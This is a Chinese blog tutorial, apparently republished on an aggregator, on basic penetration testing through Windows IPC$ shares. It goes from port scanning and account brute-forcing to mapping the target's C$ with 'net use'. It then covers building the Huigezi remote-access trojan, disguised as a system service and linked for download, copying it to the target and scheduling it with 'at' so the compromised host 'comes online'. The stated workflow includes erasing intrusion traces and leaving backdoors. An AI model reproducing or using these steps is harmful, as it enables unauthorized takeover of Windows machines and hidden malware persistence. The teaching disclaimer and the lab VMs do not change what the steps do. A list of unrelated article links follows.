渗透测试基础【01】——测试流程(IPC$)

news2024/10/5 17:26:33

渗透测试基础【01】——测试流程

注意,攻击对方需要对方授权,本文章目的只为教学,不要拿去干违法的事

1 渗透测试流程

  1. 授权(获取目标用户授权,否则是违法行为)
  2. 信息收集
nslookup   whois
  1. 扫描漏洞
nmap=ip范围	端口(80...) 服务器类型(IISApache) 什么类型的网站

高级扫描:

利用服务器本身漏洞
如IIS漏洞2003-IIS6.0 2008-IIS7.0, 网站漏洞

  1. 漏洞利用
  2. 提权(shell环境、桌面环境、最高权限)

shell环境的意思是拿到对方的命令行窗口,相当于你本地操作的是对方的命令行

  1. 消除入侵痕迹
  2. 留后门

可以留下一个木马或者其他,方便下次直接入侵

  1. 渗透测试报告

2 简单漏洞利用【IPC$】

Internet Process Connection(IPC)命名管道
此处我使用我本地win10的本机去破解虚拟机上的win7

手工测试端口号开放:

telnet IP地址 测试端口

telnet 192.168.145.98 445
  • 出现如下界面表明对方开启445端口(黑窗口)
    在这里插入图片描述

  • 如下界面表明对方未开启端口
    在这里插入图片描述

①scanport扫描445端口

②漏洞利用之IPC$

进行账户暴力破解:NTscan

net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del

# c$对应的是对方用户的c盘
net use f: \\10.1.1.2\c$ 密码 /user:用户
# ipc$对应是对方用户的所有盘
net use f: \\10.1.1.2\ipc$ 密码 /user:用户
  • 使用管理员运行cmd【win+r 然后ctrl+shift+enter】
net use \\192.168.145.98\ipc$ 123.com /user:administrator
# 123.com 密码(如果是空密码,直接输入""即可)
# administrator 账户

在这里插入图片描述

>f7可以查看cmd历史命令,esc退出查看
  • 查看是否映射成功
net use

在这里插入图片描述

③暴力破解系统密码(445端口)

过程省略…

④植入木马(留后门)

制作木马【灰鸽子软件】
链接:https://pan.baidu.com/s/1Za54jFQJyTkxDPDVKMQzAA?pwd=zj8k
提取码:zj8k

  • 配置服务器程序(木马)
    在这里插入图片描述
    在这里插入图片描述

启动项可以不用设置,保持默认也行,不过为了防止用户识别出密码,我们可以将名称改为windows system service等等【该服务会自动写到注册表并注册为服务】

在这里插入图片描述

copy d:\\heihei.exe \\192.168.145.30\c$

# copy heihei.exe \\192.168.145.98\d$
  • 结果:
    在这里插入图片描述

  • 虚拟机上也已经有对应文件了:

在这里插入图片描述

⑤设置计划任务、自动执行木马

  • 查看时间
# 查询目标机上对应时间,方便设置定时任务
net time \\192.168.145.98

在这里插入图片描述

  • 设置定时任务
at \\192.168.14530 15:00 "c:\heihei.exe"

在这里插入图片描述

  • 结果查看

在目标机器(win7)以管理员运行cmd,查看定时任务

at

在这里插入图片描述
⑥等待肉鸡上线

在这里插入图片描述
在这里插入图片描述

现在来到win7,win+R,输入services.msc,查看对应服务

在这里插入图片描述

服务成功注册!!!

资料:

①安装的win7没有管理员

WIN7家庭普通版没有“本地用户和组”项,不能通过“用计算机右键-管理”的方法开启超级管理员帐户Administrator。

要开启Win7家庭普通版本的超级管理员账户,你首先需要使用拥有管理员权限的账户登录系统,然后按照以下步骤操作:

1> 打开注册表:点击“开始”-> “运行” 在运行窗口中输入:regedit

2> 找到注册表项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\

3> 在上述注册表项下新建注册表项“SpecialAccounts”,再在其下新建子项“UserList”,然后新建一个名为“Administrator”的DWORD(32位)值,将其数值改成“1”

4> 激活administrator用户。重启计算机,按F8后进安全模式,在管理员权限下点击“开始”-> “运行” 在运行窗口中输入:cmd,在DOS窗口下输入:

复制代码代码如下:

net user administrator /active:yes

5> 重启计算机或切换用户,这时应该能看到超级管理员administrator用户,以administrator身份登陆即可,默认无密码!

②iso文件

  • 可以通过https://msdn.itellyou.cn/下载
    在这里插入图片描述
  • 百度网盘

链接:https://pan.baidu.com/s/1Ela-qgJ6sJQPtrMO5PzZRA?pwd=zj8k
提取码:zj8k

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/157459.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【前端代码高亮】页面代码高亮展示之Highlight高亮组件应用详解,附多个主题效果

【写在前面】作为前端开发的基本上都有接触这个高亮组件,这个也是目前被大家誉为最全面,体验最好的,所以针对数据展示型高亮显示我是力推这个的,但是我个人还是觉得还有不完美的地方,比如说一边输入一边高亮就不行了。…

《UEFI内核导读》如果没有内存,程序代码还能不能执行?

敬请关注:“固件C字营 首先思考一个问题,冯洛伊曼架构的计算机如果没有内存,代码能被否正常执行?过程(函数)能不能被相互调用?答案是肯定的,其中的一个实现方法如下。这里只介绍汇编…

如何在Instagram上开店?Instagram开店教程请收好

Instagram 是国外非常重要的图像分享平台,具有很强的视觉吸引力。更重要的是,它是最受网红欢迎的社交媒体网站之一,每天有超过5亿用户访问它。巨大的流量和高活跃度,为卖家提供了大量的营销机会。而且最重要的是,现在在…

唤醒手腕 Go 语言开发学习笔记(基本简介、环境安装、基础知识)

1. Go语言简介 Go(又称 Golang)是 Google 的 Robert Griesemer,Rob Pike 及 Ken Thompson 开发的一种静态强类型、编译型语言。Go 语言语法与 C 相近,但功能上有:内存安全,GC(垃圾回收&#xf…

day12|层序遍历合集、226.翻转二叉树、101.对称二叉树

目录 层序遍历合集 102.二叉树的层序遍历 107.二叉树的层次遍历II 199.二叉树的右视图 637.二叉树的层平均值 429.N叉树的层序遍历 515.在每个树行中找最大值 116.填充每个节点的下一个右侧节点指针 117.填充每个节点的下一个右侧节点指针II 104.二叉树的最大深度 11…

Hi3861鸿蒙物联网项目实战:智慧农业

华清远见FS-Hi3861开发套件,支持HarmonyOS 3.0系统。开发板主控Hi3861芯片内置WiFi功能,开发板板载资源丰富,包括传感器、执行器、NFC、显示屏等,同时还配套丰富的拓展模块。开发板配套丰富的学习资料,包括全套开发教程…

联合体(共用体) :(笔记补充)

目录 一.联合体的基本概念 二.相关面试题 三.联合体大小计算 关于结构体的内存对齐:http://t.csdn.cn/fbQuo 一.联合体的基本概念 联合也是一种特殊的自定义类型,这种类型定义的变量也包含一系列的成员,特征是这些成员公用同一块空间(所以…

jar转成dex文件 dex文件转化为smali文件

jar转成dex文件 dx 可以利用android studio中的dx工具。 可以看到android的tool安装位置: 在此路径下的如下目录有dx.bat,这个正是我们需要使用的工具。 D:\sdk\build-tools\30.0.3将dx.bat添加到环境变量 基本指令 > dx --dex --output 输出路径 待转化的jar包C

MySQL通过 XtraBackup 备份恢复单个库

GreatSQL社区原创内容未经授权不得随意使用,转载请联系小编并注明来源。GreatSQL是MySQL的国产分支版本,使用上与MySQL一致。作者:王权富贵文章来源:GreatSQL社区原创 1.概述 本文通过 XtraBackup 备份单个数据库,然后…

Elasticsearchdump 数据导入/导出

一.安装过程 当前工具主要是用来对ES中的数据进行数据导入/导出,以及对数据迁移相关,使用elasticdump工具需要使用到npm,所以需要安装相关的依赖 目前使用到的ES版本是7.x 安装NODE 通过npm安装elasticdump # 本地安装和全局安装的区别在于…

3.25 haas506 2.0开发教程-充电电压检测

haas506 2.0开发教程-充电检测1.案例说明2.硬件准备连线3.代码4.测试1.案例说明 可以通过USB端口对连接在开发板上的锂电池进行充电,USB最大供电电压5V。案例使用锂电池供电。通过原理图看到使用ADC2读取锂电池电压,并且采集电压做了分压处理&#xff0…

第六篇 VGGNet——模型精讲

文章目录 1、模型介绍网络结构3 模型特性1、模型介绍 VGGNet是通过简单堆叠卷积构建网络的巅峰之作,在后面的模型就是ResNet这种残差网络的时代。 VGGNet是由牛津大学视觉几何小组(Visual Geometry Group, VGG)提出的一种深层卷积网络结构,他们以7.32%的错误率赢得了201…

为什么我们的微服务中需要网关?

玩过微服务的小伙伴对 Spring Cloud 中的的 Spring Cloud Gateway 多多少少都有一些了解,松哥之前既写过相关的文章,也录过相关的视频跟小伙伴们介绍 Spring Cloud Gateway,不过在之前的介绍中,我可能更加侧重于跟小伙伴们介绍 Sp…

接到新需求时,从何开始设计?

即便我们能够极尽所能把代码写整洁,规避各种坏味道,但我们小心翼翼维护的代码,还是可能因为新的需求被破坏。 新的需求总会在路上,所以,写代码时需要时时刻刻保持嗅觉。 实现驳回 有个功能,内容作品提交…

lxmlxpath一站式教学

文章目录XPath定义XPath 概览安装lxml初步使用xpath 常用表达式获取所有节点获取子节点获取父亲节点属性匹配获取文本获取属性属性多值匹配多属性匹配按序选择节点轴选择总结XPath定义 XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历…

OMNet++安装pydev

菜单栏->Help->Install New SoftWare->Add 输入 Pydev http://pydev.sourceforge.net/pydev_update_site/5.2.0链接为下载5.2.0版本&#xff0c;若jdk<1.8安装5.2.0之前的版本。\color{blue}{链接为下载5.2.0版本&#xff0c;若jdk<1.8安装5.2.0之前的版本。}链…

无代理Bean对象Spring循环依赖处理

Bean A和B互相依赖 A对象或者B对象,创建对象时会形成死循环,解决: Spring中创建对象:实例化、初始化 闭环:此时,图中是一个闭环,如果想解决这个问题,那么就必须要保证不会出现第二次创建A(B)对象这个步骤,也就是说从容器中获取A的时候必须要能够获取到 思考,在spring…

RabbitMQ(三)工作原理及核心概念

目录工作原理图1.Connection 连接2.Channel 信道3.Virtual host 虚拟主机4.Queue 队列5.Exchange 交换机5.1 direct5.2 fanout5.3 topic5.4 headers官网地址&#xff1a;https://www.rabbitmq.com/ 下载地址&#xff1a;https://www.rabbitmq.com/download.html RabbitMQ 的5大…

chk文件恢复和文件恢复的区别有哪些?

文件恢复也就是我们常说的数据恢复&#xff0c;一般用于恢复误删除、损坏的文件数据&#xff0c;那么chk文件恢复又是什么意思呢&#xff1f;两者有什么区别呢&#xff1f;文件恢复市面上常见的文件恢复软件&#xff0c;一般都是用于恢复那些被删除、损坏的文件数据恢复&#x…

Jenkin权限控制——项目矩阵授权策略

开启授权策略 Jenkins的项目权限控制通过【授权策略】实现&#xff0c;【授权策略】需要plugins提供&#xff0c;首先需要安装Role-based Authorization Strategy 安装Role-based Authorization Strategy 管理Jenkins——》插件管理——》搜素——》Role-based Authorizatio…